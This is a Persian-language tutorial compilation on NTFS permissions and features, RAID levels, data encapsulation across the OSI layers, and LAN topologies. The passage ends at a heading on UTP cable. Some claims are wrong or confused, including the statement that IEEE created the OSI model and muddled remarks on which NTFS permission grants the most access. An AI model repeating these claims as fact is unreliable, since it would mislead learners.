يكي از مهمترين مشكلات امنيتي در سيستم FAT16  و FAT32 عدم توانايي در تعريف سطوح مجوز دسترسي به فايل ها و يا پوشه ها مي باشد . كه اين امر مي تواند به عنوان يكي از دلايل ناكارآمدي و قابل اطمينان نبودن اين سيستم ها در سطوح شبكه باشد .
بر اين اساس مايكروسافت سيستم فايلي جديدي تحت عنوان NTFS را ايجاد نمود كه از يك ساختار 64 بيتي پشتيباني مي كند و از اين رو كاربران مي توانند فايل هايي ايجاد كنند كه طول نام آنها تا 256 كاركتر باشد .
چهار مجوز استاندارد در سيستم NTFS براي فايل ها و پوشه ها وجود دارند :

1- No Access:   با انتخاب اين گزينه كاربران هيچگونه مجوزي براي خواندن ، نوشتن و ... فايل يا پوشه مربوطه نواهند داشت .

2- Read : با توجه به آنكه اجزاه خواندن يك فايل شامل اجراي آن نيز مي باشد ،از اين رو كاربري كه اين سطوح از دسترسي را داشته باشد مي تواند فايل را اجرا كرده و آن را بخواند .

3- Change :  اين سطح  دسترسي و مجوز ، كاربر را قادر مي كند تا فايل را خوانده و در صورت لزوم تغييرات خود را در آن انجام دهد يا حني فايل را حذف كند .

4- Full Control : با فعال بودن اين گزينه كاربران داراي مجوز مي توانند فايل را خواند ، تغييرات مورد نياز را درآن ايجاد كرده و يا حذف كنند . در واقع تمام امكانات و اختياراتي كه كاربر در حالت Change دارد در اين قسمت نيز وجود دارد و فرق اين دو سطح مجوز در آن است كه با داشتن مجوز Full Controll  ، كاربر مي تواند حتي براي ساير كاربران سيستم دسترسي تعريف كند و يا دسترسي كاربر ديگر را از آن پوشه و يا فايل حذف كند .

از لحاظ امنيتي بهتر است حتي الامكان از اين مجوز استفاده نكنيد ، زيرا داشتن مجوز Change بالاترين سطح دسترسي را به كاربران مي دهد مگر آنكه واقعا بخواهيد كاربري امكان تعريف يا حذف مجوز براي سايرين را داشته باشد .

البته مجوزه هاي ديگري نيز چون Read Only ، No Execute، Execute Only ، Write Only و ... نيز قابل تعريف مي باشند .

 

تعيين مجوز براي  منابع اشتراكي شبكه

مجوزهاي بررسي شده در فوق در واقع براي تعيين سطح دسترسي كاربراني است كه از يك سيستم بطور مشترك استفاده مي كنند . اما ممكن است سيستم شما در بين چندين سيستم ديگر و در يك شبكه قرار گرفته باشد و شما بخواهيد با تعيين سطح دسترسي هاي مشخص امكان دسترسي به يك يا چند كاربر بدهيد . پس از تعريف منابع اشتاركي در سيستم تان كه مي تواند فايل ها ، پوشه ها ، درايو ها ، چاپگر ، اسكنر و ... باشد ، كاربران داراي مجوز مي توانند به اين منابع دسترسي داشته باشند .

با توجه به آنچه گذشت مي توان سطوح دسترسي كاربران در سطح شبكه را نيز به شكل زير تعريف كرد :

1- No Access:   نازلترين سطح دسترسي (دسترسي وجود ندارد)

2- Read : اجرا و خواندن

3- Change : اجرا ، خواندن و اعمال تغييرات

4- Full Control : اجرا ، خواندن ، نوشتن و اعمال تغييرات ، تغيير در سطح مجوز ها

با توجه به اين توانايي ها شما مي توانيد براي  يك فايل و يا پوشه در هر دو وضعيت سيستم محلي و شبكه ، مجوزلازم را به كاربران بدهيد .

مثلا با تعيين مجوز Change براي يك فايل در سيستم محلي ، به كاربراني كه در پشت سيستم شما مي نشينند امكان اعمال تغييرات را در فايل بدهيد و با تعيين مجوز Read در سطح شبكه تنها امكان خواندن را به كاربراني كه از شبكه استفاده مي كنند بدهيد .

البته در صورت جابجايي اين سطوح ، يعني تعيين مجوز Change, در سطح شبكه و Read در سطح سيستم محلي  ، تنها مجوز Read كه حداقل سطح دسترسي  بين اين دو است به كاربران داده مي شود و كاربران شبكه نيز تنها مي توانند فايل را خوانده و اجرا كنند .

 

ويندوز XP ميتواند از سه فايل سيستم FAT16, FAT32 و NTFS استفاده کند. پاره ای از قابليت های ملموس و جالب NTFS به شرح زير است:
امنيت
FAT16 و FAT32 مطلقاً دارای هيچ گونه امنيت برای دسترسی به فايلها و پوشه های محلی نيستند و هر کاربری ميتواند با ورود به سيستم به کليه اطلاعات دسترسی داشته باشد درحاليکه NTFS اين امکان را به ما ميدهد تا برای دسترسی به فايلها و پوشه ها سطح دسترسی تعريف کنيم و از دسترسی افراد غير مجاز به اطلاعات از طريق محلی جلوگيری کنيم.
Recycle Bin جداگانه
در FAT16 و FAT32 هر آنچه که کاربرها حذف ميکنند در يک Recycle Bin مشترک قرار ميگيرد بدون در نظر گرفتن کاربر. ولی در NTFS کليه کاربرها دارای يک Recycle Bin مستقل هستند که باعث ميشود ديگر کاربرها به فايلها حذف شده کاربران ديگر دسترسی نداشته باشند.
Encryption
با NTFS اين امکان به شما داده ميشود تا فايلها و پوشه های خود را کد کنيد تا از دسترسی غير مجاز جلوگيری شود حتی اگر سطح دسترسی تعيین نشده باشد.
قالبيت بازيافت
NTFS اين قابليت را دارد تا فايلها را در هنگام بروز خطای فايل سيستم بازيافت نمايد. NTFS يک سری سکتورهای يدکی در نظر ميگيرد تا هنگام خرابی اطلاعات را به Cluster های سالم انتقال دهد و Cluster خراب را جهت جلوگيری از استفاده مجدد نشانه گذاری کند.
فشرده سازی
NTFS اين قابليت را به ويندوز اضافه ميکند که بدون نياز به نصب برنامه جانبی بتوانيد فايلها و پوشه ها را فشرده سازيد.
جيره بندی ديسک (Disk Quota)
با اين گزينه ميتوانيد فضای ديسک را بين کاربران جيره بندی کنيد تا هر کاربر نتواند بيشتر از آن حجمی که مجاز است از ديسک استفاده کند. اين قابليت در سيستم هايی که در آنها با محدوديت حجم مواجهيم بسيار موثر است.
اگر فکر ميکنيد اين گزينه های برای شما جذابيت کافی را دارند تا درايوهای خود را به NTFS تغيير دهيد ميتوانيد از دستور convert در خط فرمان برای تبديل درايوها به NTFS استفاده کنيد:

Convert x: /fs:ntfs

در اين دستور x را با نام درايو جايگزين کنيد.
توجه : همه سيستم عاملها قادر به خواندن درايوهای NTFS نيستند و بايد قبل از تبديل به اين مساله توجه داشته باشيد. اگر از ويندوز 98 بر روی سيستمتان استفاده ميکنيد به هيچ وجه اين تبديل را انجام ندهيد مگر با مطالعه دقیق.

RAID کوتاه شده عبارت Redundant Array of Inexpensive Disks ميباشد و کار آن ايجاد يک واحد از مجموع چند هارد ديسک ميباشد. در واقع با قرار دادن چند هارد ديسک در کنار هم و پياده سازی RAID همه هارد ديسکهای ما به يک واحد تبديل ميشوند و سيستم همه آنها را فقط به عنوان يک منبع واحد ميبيند که بسته به اينکه چه سطحی از RAID پياده سازی شده باشد ميتواند باعث افزايش کارايی و يا امنيت اطلاعات و يا تلفيقی از اين دو شود.
پياده سازی RAID همچون بسياری ديگر از تکنولوژی ها هم بصورت سخت افزاری و هم نرم افزاری امکان پذير است که مسلماً مدل سخت افزاری دارای سرعت و پايداری بيشتری است و مدل نرم افزاری فقط در شرايطی پيشنهاد ميشود که با کمبود امکانات و بودجه مواجه هستيم و يا اينکه قرار است بر روی يک سيستم پشتيبان و نه مادر پياده سازی شود.
هميشه با اين مساله مخالف بوده ام که سيستمی را که در آن از تکنولوژی RAID استفاده نشده است را يک سرويس دهنده بنامم و به همين دليل هميشه سعی کردم مشتری را به پياده سازی حداقل، که همانا پياده سازی RAID به روش نرم افزاری است قانع کنم. خوشبختانه همزمان با گسترش فرهنگ استفاده از سيستمها در بين مديران و صاحبان مشاغل و اهميت اطلاعات و حفظ آن برای اين گروه، هزينه پياده سازی RAID به کمک پيشرفت تکنولوژی روز به روز ارزانتر ميشود و هم اکنون با توسعه بيش از پيش اين تکنولوژی و کشيده شدن آن به دايره ديسکهای با تکنولوژی ATA حتی شاهد درخواست پياده سازی اين تکنولوژی بر روی سيستمهای روميزی هستيم!
اما فارغ از اينکه RAID بصورت نرم افزاری و يا سخت افزاری پياده سازی ميشود و يا نياز ما استفاده از هارد ديسکهای SCSI و يا ATA است، تکنولوژی RAID دارای سطوح گوناگون است که در پايين به ذکر عمده ترين آنها ميپردازم:
RAID-0
در اين مدل حداقل به دو ديسک نياز است و حداقل اتلاف فضا را به همراه حداکثر اجرا در خواندن و نوشتن اطلاعات دارا ميباشد ولی در عين حال دارای افزونگی (Redundancy) نميباشد که باعث ميشود در اغلب سناريوها از اين مدل در کنار RADI-1 استفاده شود

 

RAID-1
اين مدل فقط و فقط بر روی دو هارد ديسک قابل پياده سازی است و ارزانترين مدل RAID است که دارای افزونگی است. از اين مدل به نام Mirroring ياد ميشود و در واقع با پياده سازی اين مدل اطلاعات ما همزمان بر روی دو ديسک نوشته ميشوند که در نتيجه سرعت نوشتن را در جهت منفی تحت تاثير قرار ميدهد ولی از طرفی سرعت خواندن اطلاعات افزايش ميابد. در اين مدل چنانچه يکی از دو هارد ديسک به دلايلی دچار مشکل و خرابی شود اطلاعات هيج صدمه ای نخواهند ديد و سيستم به فعاليت عادی خود ادامه خواهد داد. نکته منفی اين سطح از RAID ميزان فضای قابل استفاده است که فقط معادل هارد ديسک با فضای کمتر استفاده شده ميباشد. بعنوان مثال اگر از دو هارد ديسک 30 و 40 گيگابايتی استفاده کرده ايد، فضای قابل استفاده برای ذخيره سازی اطلاعات معادل 30 گيگابايت ميباشد.

 

RAID-5
اين سطح از RAID حداقل نياز به سه ديسک سخت خواهد داشت و استفاده از آن بسيار متداول است. در اين سطح اتلاف فضا تقريباً 20 تا 30 درصد کل فضای استفاده  شده ميباشد و دارای انعطاف پذيری جهت افزودن ديسک های اضافی ميباشد.  اطلاعات به قطعات کوچکی شکسته شده و بر روی همه ديسکها پخش ميشود و يک Parity هم جهت بازيابی اطلاعات در صورت بروز مشکل برای هر يک از ديسکها بصورت چرخشی بر روی يکی از ديسکها نوشته ميشود.

 

در صورت تمايل ميتوانيد با مراجعه به وبسايتهای زير اطلاعات بيشتر و دقيقتری از اين تکنولوژی کسب کنيد:
http://www.adaptec.com
http://www.mylex.com
http://www.promise.com

آيا تاکنون برای شما  اين سوال مطرح شده است که نحوه مبادله اطلاعات بين دو کامپيوتر موجود در يک شبکه به چه صورت است ؟  همانگونه که در مطلب "آشنائی با مدل مرجع OSI " اشاره گرديد ، کامپيوترهای موجود در يک شبکه به منظور مبادله اطلاعات تابع مدل مرجع OSI می باشند . مدل فوق، همانند يک دستورالعمل اجرائی بوده و عمليات لازم در زمان ارسال و يا دريافت داده را برای يک کامپيوتر مشخص می نمايد . به منظور آشنائی و آناليز فرآيند مبادله داده بين دو کامپيوتر موجود در يک شبکه  به بررسی يک نمونه مثال کاربردی خواهيم پرداخت .
زمانی که يک اتومبيل در کارخانه ای توليد می گردد ، يک نفر تمامی کارها را انجام نخواهد داد . توليد يک اتومبيل بر اساس يک خط توليد انجام شده و همزمان با حرکت اتومبيل در خط توليد هر شخص بخش های متفاوتی را به آن اضافه نموده  و زمانی که به انتهای خط توليد می رسيم ، اتومبيل مورد نظر توليد و آماده استفاده خواهد بود .
وضعيت فوق در رابطه با داده ارسالی از يک کامپيوتر به کامپيوتر ديگر نيز صدق می کند . مدل OSI که توسط کميته IEEE ايجاد شده است، قوانين لازم  به منظور مبادله اطلاعات بين کامپيوترها را فراهم می نمايد . بدين ترتيب و با پيروی از مجموعه رهنمودهای ارائه شده در مدل مرجع OSI ، هر کامپيوتر قادر به مبادله اطلاعات با ساير کامپيوترها ( صرفنظر از نوع کامپيوتر ) خواهد بود . حرکت داده با دو روش متفاوت در مدل مرجع OSI انجام می شود . در سمت فرستنده ( به طرف پائين ) ، داده ها کپسوله شده و برای کامپيوتر گيرنده ارسال می شوند . در سمت گيرنده ( به طرف بالا ) ، داده ها از حالت کپسوله خارج شده و در  نهايت در اختيار کامپيوتر گيرنده قرار داده می شوند.

ارسال داده  : شکل زير  نحوه ارسال داده توسط يک کامپيوتر را نشان می دهد :

 

توضيحات :

• کامپيوتر موجود در شبکه ، قصد ارسال داده برای کامپيوتر ديگر را دارد . در لايه Application ، رابط کاربر وجود داشته و از طريق آن کاربر با برنامه مورد نظر ارتباط برقرار می نمايد .
• پس از ارسال داده از لايه Application ، داده ارسالی به ترتيب لايه های Presentation و Session را طی می نمايد . هر يک از لايه های فوق اطلاعات اضافه ای را به داده اوليه اضافه نموده و در نهايت داده در اختيار لايه Transport قرار داده می شود .
• در لايه Transport ، داده به بخش های کوچکتری تقسيم و هدر TCP به آن اضافه می گردد . به داده موجود در لايه Transport ، "سگمنت" گفته می شود . هر سگمنت شماره گذاری شده تا امکان بازسازی مجدد آنان در مقصد وجود داشته باشد ( انتظار داريم داده دريافتی توسط گيرنده همان داده ارسالی توسط فرستنده باشد ) .
• هر سگمنت در ادامه به منظور آدرس دهی شبکه ( منظور آدرس دهی منطقی است ) و روتينگ مناسب در اختيار لايه Network قرار داده می شود . به داده موجود در لايه Network ، بسته اطلاعاتی و يا Packet گفته می شود . لايه Network ، هدر IP خود را به آن اضافه نموده و آن را برای لايه DataLink ارسال می نمايد .
• در لايه DataLink به داده ئی که هم اينک شامل هدر لايه های Transport و Network است ، "فريم" گفته می شود . در اين لايه ، هر يک از بسته های اطلاعاتی دريافتی، کپسوله شده و در يک فريم به همراه آدرس سخت افزاری ( آدرس MAC ) کامپيوترهای فرستنده و گيرنده سازماندهی می شوند . در فريم فوق اطلاعات مربوط به LLC ( نوع پروتکل ارسالی توسط لايه قبلی زمانی که به کامپيوتر مقصد می رسد )، نيز اضافه می شود . در بخش انتهائی فريم ، فيلدی با نام FCS که از کلمات Frame Check Sequence اقتباس شده است به منظور بررسی خطاء اضافه می گردد .
• در صورتی که کامپيوتر مقصد بر روی يک کامپيوتر از راه دور باشد ، فريم به روتر و يا gateway به منظور مسيريابی مناسب ارسال می گردد .
• به منظور استقرار فريم بر روی شبکه می بايست اطلاعات موجود به صورت سيگنال های ديجيتال تبديل شوند . با توجه به اين که يک فريم مشتمل بر مجموعه ای از صفر و يک است ، لايه Physical عمليات کپسوله نمودن ارقام موجود در فريم به يک سيگنال ديجيتال را انجام خواهد داد .
• در ابتدای فريم و به منظور انجام عمليات همزمان سازی ( هماهنگ شدن دريافت کننده با فرستنده ) ، تعداد اندکی صفر و يک اضافه می گردد .

دريافت داده : شکل زير نحوه دريافت داده توسط يک کامپيوتر  را نشان می دهد :

 

توضيحات :

• کامپيوتر دريافت کننده در ابتدا به منظور هماهنگ کردن خود با کامپيوتر فرستنده در جهت خواندن سيگنال ديجيتال، تعداد محدودی از بيت ها را می خواند . پس از اتمام عمليات همزمان سازی و دريافت تمامی فريم آن را به لايه بالاتر ( لايه DataLink )، ارسال می نمايد .
• لايه DataLink ، در ابتدا بررسی لازم در رابطه با وجود خطاء ( CRC ) و يا همان Cyclic Redundancy Check را در خصوص اطلاعات دريافتی انجام خواهد داد . محاسبات فوق توسط کامپيوتر دريافت کننده انجام شده و ماحصل کار با مقدار موجود در فيلد FCS مقايسه شده و بر اساس آن تشخيص داده خواهد شد که آيا فريم دريافتی بدون بروز خطاء دريافت شده است ؟ در ادامه لايه DataLink ، اطلاعات اضافه و يا هدری را که توسط لايه DataLink کامپيوتر از راه دور به آن اضافه شده است را برداشته و مابقی داده را که به آن Packet اطلاق می گردد برای لايه Network ارسال می نمايد .
• در لايه Network ، آدرس IP موجود در بسته اطلاعاتی با آدرس IP کامپيوتر دريافت کننده مقايسه شده و در صورت مطابقت ، هدر لايه Network و يا هدر IP از بسته اطلاعاتی برداشته شده و مابقی بسته اطلاعاتی برای لايه بالاتر ( لايه Transport ) ، ارسال می گردد . به داده موجود در اين لايه ، سگمنت گفته می شود .
• سگمنت در لايه Transport پردازش و عمليات بازسازی مجدد داده دريافتی ، انجام خواهد شد . در زمان بازسازی مجدد داده دريافتی توسط کامپيوتر گيرنده به فرستنده اطلاع داده می شود که وی هر يک از بخش ها را دريافت نموده است تا خللی در بازسازی مجدد داده ايجاد نگردد . با توجه به ارسال يک ACK برای فرستنده ( اعلام وضعيت سگمنت دريافتی به کامپيوتر فرستنده ) ، از پروتکل TCP در مقابل UDP استفاده شده است . پس از انجام عمليات فوق ، داده دريافتی در اختيار لايه Application گذاشته می شود .

در زمان مبادله اطلاعات بين کامپيوترهای موجود در شبکه ، کاربران درگير جزئيات مسئله نشده و تمامی فرآيندهای اشاره شده به صورت اتوماتيک انجام خواهد شد .

يک شبکه شامل مجموعه ای از دستگاهها ( کامپيوتر ، چاپگر و ... ) بوده که با استفاده از يک روش ارتباطی ( کابل ، امواج راديوئی ، ماهواره ) و بمنظور اشتراک منابع فيزيکی ( چاپگر) و اشتراک منابع منطقی ( فايل ) به يکديگر متصل می گردند. شبکه ها می توانند با يکديگر نيز مرتبط شده و شامل زير شبکه هائی باشند.

تفسيم بندی شبکه ها

.شبکه های کامپيوتری را بر اساس مولفه های متفاوتی تقسيم بندی می نمايند. در ادامه به برخی از متداولترين تقسيم بندی های موجود اشاره می گردد .

● تقسيم بندی بر اساس نوع وظايف . کامپيوترهای موجود در شبکه را با توجه به نوع وظايف مربوطه به دو گروه عمده : سرويس دهندگان (Servers) و يا سرويس گيرندگان (Clients) تقسيم می نمايند. کامپيوترهائی در شبکه که برای ساير کامپيوترها سرويس ها و خدماتی را ارائه می نمايند ، سرويس دهنده ناميده می گردند. کامپيوترهائی که از خدمات و سرويس های ارائه شده توسط سرويس دهندگان استفاده می کنند ، سرويس گيرنده ناميده می شوند .

در شبکه های Client-Server ، يک کامپيوتر در شبکه نمی تواند هم بعنوان سرويس دهنده و هم بعنوان سرويس گيرنده ، ايفای وظيفه نمايد.

 

در شبکه های Peer-To-Peer ، يک کامپيوتر می تواند هم بصورت سرويس دهنده و هم بصورت سرويس گيرنده ايفای وظيفه نمايد.

 

يک شبکه LAN در ساده ترين حالت از اجزای زير تشکيل شده است :

- دو کامپيوتر شخصی . يک شبکه می تواند شامل چند صد کامپيوتر باشد. حداقل يکی از کامپيوترها می بايست بعنوان سرويس دهنده مشخص گردد. ( در صورتيکه شبکه از نوع Client-Server باشد ). سرويس دهنده، کامپيوتری است که هسته اساسی سيستم عامل بر روی آن نصب خواهد شد.

- يک عدد کارت شبکه (NIC) برای هر دستگاه. کارت شبکه نظير کارت هائی است که برای مودم و صدا در کامپيوتر استفاده می گردد. کارت شبکه مسئول دريافت ، انتقال ، سازماندهی و ذخيره سازی موقت اطلاعات در طول شبکه است . بمنظور انجام وظايف فوق کارت های شبکه دارای پردازنده ، حافظه و گذرگاه اختصاصی خود هستند.

● تقسيم بندی بر اساس توپولوژی . الگوی هندسی استفاده شده جهت اتصال کامپيوترها ، توپولوژی ناميده می شود. توپولوژی انتخاب شده برای پياده سازی شبکه ها، عاملی مهم در جهت کشف و برطرف نمودن خطاء در شبکه خواهد بود. انتخاب يک توپولوژی خاص نمی تواند بدون ارتباط با محيط انتقال و روش های استفاده از خط مطرح گردد. نوع توپولوژی انتخابی جهت اتصال کامپيوترها به يکديگر ، مستقيما" بر نوع محيط انتقال و روش های استفاده از خط تاثير می گذارد. با توجه به تاثير مستقيم توپولوژی انتخابی در نوع کابل کشی و هزينه های مربوط به آن ، می بايست با دقت و تامل به انتخاب توپولوژی يک شبکه همت گماشت . عوامل مختلفی جهت انتخاب يک توپولوژی بهينه مطرح می شود. مهمترين اين عوامل بشرح ذيل است :

- هزينه . هر نوع محيط انتقال که برای شبکه LAN انتخاب گردد، در نهايت می بايست عمليات نصب شبکه در يک ساختمان پياده سازی گردد. عمليات فوق فرآيندی طولانی جهت نصب کانال های مربوطه به کابل ها و محل عبور کابل ها در ساختمان است . در حالت ايده آل کابل کشی و ايجاد کانال های مربوطه می بايست قبل از تصرف و بکارگيری ساختمان انجام گرفته باشد. بهرحال می بايست هزينه نصب شبکه بهينه گردد.

- انعطاف پذيری . يکی از مزايای شبکه های LAN ، توانائی پردازش داده ها و گستردگی و توزيع گره ها در يک محيط است . بدين ترتيب توان محاسباتی سيستم و منابع موجود در اختيار تمام استفاده کنندگان قرار خواهد گرفت . در ادارات همه چيز تغيير خواهد کرد.( لوازم اداری، اتاقها و ... ) . توپولوژی انتخابی می بايست بسادگی امکان تغيير پيکربندی در شبکه را فراهم نمايد. مثلا" ايستگاهی را از نقطه ای به نقطه ديگر انتقال و يا قادر به ايجاد يک ايستگاه جديد در شبکه باشيم .

سه نوع توپولوژی رايج در شبکه های LAN استفاده می گردد :

• § BUS
• § STAR
• § RING

توپولوژی BUS . يکی از رايجترين توپولوژی ها برای پياده سازی شبکه های LAN است . در مدل فوق از يک کابل بعنوان ستون فقرات اصلی در شبکه استفاده شده و تمام کامپيوترهای موجود در شبکه ( سرويس دهنده ، سرويس گيرنده ) به آن متصل می گردند.

 

مزايای توپولوژی BUS

- کم بودن طول کابل . بدليل استفاده از يک خط انتقال جهت اتصال تمام کامپيوترها ، در توپولوژی فوق از کابل کمی استفاده می شود.موضوع فوق باعث پايين آمدن هزينه نصب و ايجاد تسهيلات لازم در جهت پشتيبانی شبکه خواهد بود.

- ساختار ساده . توپولوژی BUS دارای يک ساختار ساده است . در مدل فوق صرفا" از يک کابل برای انتقال اطلاعات استفاده می شود.

- توسعه آسان . يک کامپيوتر جديد را می توان براحتی در نقطه ای از شبکه اضافه کرد. در صورت اضافه شدن ايستگاههای بيشتر در يک سگمنت ، می توان از تقويت کننده هائی به نام Repeater استفاده کرد.

معايب توپولوژی BUS

- مشکل بودن عيب يابی . با اينکه سادگی موجود در تويولوژی BUS امکان بروز اشتباه را کاهش می دهند، ولی در صورت بروز خطاء کشف آن ساده نخواهد بود. در شبکه هائی که از توپولوژی فوق استفاده می نمايند ، کنترل شبکه در هر گره دارای مرکزيت نبوده و در صورت بروز خطاء می بايست نقاط زيادی بمنظور تشخيص خطاء بازديد و بررسی گردند.

- ايزوله کردن خطاء مشکل است . در صورتيکه يک کامپيوتر در توپولوژی فوق دچار مشکل گردد ، می بايست کامپيوتر را در محلی که به شبکه متصل است رفع عيب نمود. در موارد خاص می توان يک گره را از شبکه جدا کرد. در حالتيکه اشکال در محيط انتقال باشد ، تمام يک سگمنت می بايست از شبکه خارج گردد.

- ماهيت تکرارکننده ها . در موارديکه برای توسعه شبکه از تکرارکننده ها استفاده می گردد، ممکن است در ساختار شبکه تغييراتی نيز داده شود. موضوع فوق مستلزم بکارگيری کابل بيشتر و اضافه نمودن اتصالات مخصوص شبکه است .

توپولوژی STAR . در اين نوع توپولوژی همانگونه که از نام آن مشخص است ، از مدلی شبيه "ستاره" استفاده می گردد. در اين مدل تمام کامپيوترهای موجود در شبکه معمولا" به يک دستگاه خاص با نام " هاب " متصل خواهند شد.

 

مزايای توپولوژی STAR

- سادگی سرويس شبکه . توپولوژی STAR شامل تعدادی از نقاط اتصالی در يک نقطه مرکزی است . ويژگی فوق تغيير در ساختار و سرويس شبکه را آسان می نمايد.

- در هر اتصال يکدستگاه . نقاط اتصالی در شبکه ذاتا" مستعد اشکال هستند. در توپولوژی STAR اشکال در يک اتصال ، باعث خروج آن خط از شبکه و سرويس و اشکال زدائی خط مزبور است . عمليات فوق تاثيری در عملکرد ساير کامپيوترهای موجود در شبکه نخواهد گذاشت .

- کنترل مرکزی و عيب يابی . با توجه به اين مسئله که نقطه مرکزی مستقيما" به هر ايستگاه موجود در شبکه متصل است ، اشکالات و ايرادات در شبکه بسادگی تشخيص و مهار خواهند گرديد.

- روش های ساده دستيابی . هر اتصال در شبکه شامل يک نقطه مرکزی و يک گره جانبی است . در چنين حالتی دستيابی به محيط انتقال حهت ارسال و دريافت اطلاعات دارای الگوريتمی ساده خواهد بود.

معايب توپولوژی STAR

- زياد بودن طول کابل . بدليل اتصال مستقيم هر گره به نقطه مرکزی ، مقدار زيادی کابل مصرف می شود. با توجه به اينکه هزينه کابل نسبت به تمام شبکه ، کم است ، تراکم در کانال کشی جهت کابل ها و مسائل مربوط به نصب و پشتيبنی آنها بطور قابل توجهی هزينه ها را افزايش خواهد داد.

- مشکل بودن توسعه . اضافه نمودن يک گره جديد به شبکه مستلزم يک اتصال از نقطه مرکزی به گره جديد است . با اينکه در زمان کابل کشی پيش بينی های لازم جهت توسعه در نظر گرفته می شود ، ولی در برخی حالات نظير زمانيکه طول زيادی از کابل مورد نياز بوده و يا اتصال مجموعه ای از گره های غير قابل پيش بينی اوليه ، توسعه شبکه را با مشکل مواجه خواهد کرد.

- وابستگی به نقطه مرکزی . در صورتيکه نقطه مرکزی ( هاب ) در شبکه با مشکل مواجه شود ، تمام شبکه غيرقابل استفاده خواهد بود.

توپولوژی RING . در اين نوع توپولوژی تمام کامپيوترها بصورت يک حلقه به يکديگر مرتبط می گردند. تمام کامپيوترهای موجود در شبکه ( سرويس دهنده ، سرويس گيرنده ) به يک کابل که بصورت يک دايره بسته است ، متصل می گردند. در مدل فوق هر گره به دو و فقط دو همسايه مجاور خود متصل است . اطلاعات از گره مجاور دريافت و به گره بعدی ارسال می شوند. بنابراين داده ها فقط در يک جهت حرکت کرده و از ايستگاهی به ايستگاه ديگر انتقال پيدا می کنند.

مزايای توپولوژی RING

- کم بودن طول کابل . طول کابلی که در اين مدل بکار گرفته می شود ، قابل مقايسه به توپولوژی BUS نبوده و طول کمی را در بردارد. ويژگی فوق باعث کاهش تعداد اتصالات ( کانکتور) در شبکه شده و ضريب اعتماد به شبکه را افزايش خواهد داد.

 

- نياز به فضائی خاص جهت انشعابات در کابل کشی نخواهد بود.بدليل استفاده از يک کابل جهت اتصال هر گره به گره همسايه اش ، اختصاص محل هائی خاص بمنظور کابل کشی ضرورتی نخواهد داشت .

- مناسب جهت فيبر نوری . استفاده از فيبر نوری باعث بالا رفتن نرخ سرعت انتقال اطلاعات در شبکه است. چون در توپولوژی فوق ترافيک داده ها در يک جهت است ، می توان از فيبر نوری بمنظور محيط انتقال استفاده کرد.در صورت تمايل می توان در هر بخش ازشبکه از يک نوع کابل بعنوان محيط انتقال استفاده کرد . مثلا" در محيط های ادرای از مدل های مسی و در محيط کارخانه از فيبر نوری استفاده کرد.

معايب توپولوژی RING

- اشکال در يک گره باعث اشکال در تمام شبکه می گردد. در صورت بروز اشکال در يک گره ، تمام شبکه با اشکال مواجه خواهد شد. و تا زمانيکه گره معيوب از شبکه خارج نگردد ، هيچگونه ترافيک اطلاعاتی را روی شبکه نمی توان داشت .

- اشکال زدائی مشکل است . بروز اشکال در يک گره می تواند روی تمام گرههای ديگر تاثير گذار باشد. بمنظور عيب يابی می بايست چندين گره بررسی تا گره مورد نظر پيدا گردد.

- تغيير در ساختار شبکه مشکل است . در زمان گسترش و يا اصلاح حوزه جغرافيائی تحت پوشش شبکه ، بدليل ماهيت حلقوی شبکه مسائلی بوجود خواهد آمد .

- توپولوژی بر روی نوع دستيابی تاثير می گذارد. هر گره در شبکه دارای مسئوليت عبور دادن داده ای است که از گره مجاور دريافت داشته است . قبل از اينکه يک گره بتواند داده خود را ارسال نمايد ، می بايست به اين اطمينان برسد که محيط انتقال برای استفاده قابل دستيابی است .

● تقسيم بندی بر اساس حوزه جغرافی تحت پوشش . شبکه های کامپيوتری با توجه به حوزه جغرافيائی تحت پوشش به سه گروه تقسيم می گردند :

• § شبکه های محلی ( کوچک ) LAN
• § شبکه های متوسط MAN
• § شبکه های گسترده WAN

شبکه های LAN . حوزه جغرافيائی که توسط اين نوع از شبکه ها پوشش داده می شود ، يک محيط کوچک نظير يک ساختمان اداری است . اين نوع از شبکه ها دارای ويژگی های زير می باشند :

• § توانائی ارسال اطلاعات با سرعت بالا
• § محدوديت فاصله
• § قابليت استفاده از محيط مخابراتی ارزان نظير خطوط تلفن بمنظور ارسال اطلاعات
• § نرخ پايين خطاء در ارسال اطلاعات با توجه به محدود بودن فاصله

شبکه های MAN . حوزه جغرافيائی که توسط اين نوع شبکه ها پوشش داده می شود ، در حد و اندازه يک شهر و يا شهرستان است . ويژگی های اين نوع از شبکه ها بشرح زير است :

• § پيچيدگی بيشتر نسبت به شبکه های محلی
• § قابليت ارسال تصاوير و صدا
• § قابليت ايجاد ارتباط بين چندين شبکه

شبکه های WAN . حوزه جغرافيائی که توسط اين نوع شبکه ها پوشش داده می شود ، در حد و اندازه کشور و قاره است . ويژگی اين نوع شبکه ها بشرح زير است :

• § قابليت ارسال اطلاعات بين کشورها و قاره ها
• § قابليت ايجاد ارتباط بين شبکه های LAN
• § سرعت پايين ارسال اطلاعات نسبت به شبکه های LAN
• § نرخ خطای بالا با توجه به گستردگی محدوده تحت پوشش

● کابل در شبکه

در شبکه های محلی از کابل بعنوان محيط انتقال و بمنظور ارسال اطلاعات استفاده می گردد.ازچندين نوع کابل در شبکه های محلی استفاده می گردد. در برخی موارد ممکن است در يک شبکه صرفا" از يک نوع کابل استفاده و يا با توجه به شرايط موجود از چندين نوع کابل استفاده گردد. نوع کابل انتخاب شده برای يک شبکه به عوامل متفاوتی نظير : توپولوژی شبکه، پروتکل و اندازه شبکه بستگی خواهد داشت . آگاهی از خصايص و ويژگی های متفاوت هر يک از کابل ها و تاثير هر يک از آنها بر ساير ويژگی های شبکه، بمنظور طراحی و پياده سازی يک شبکه موفق بسيار لازم است .

- کابل Unshielded Twisted pair )UTP)

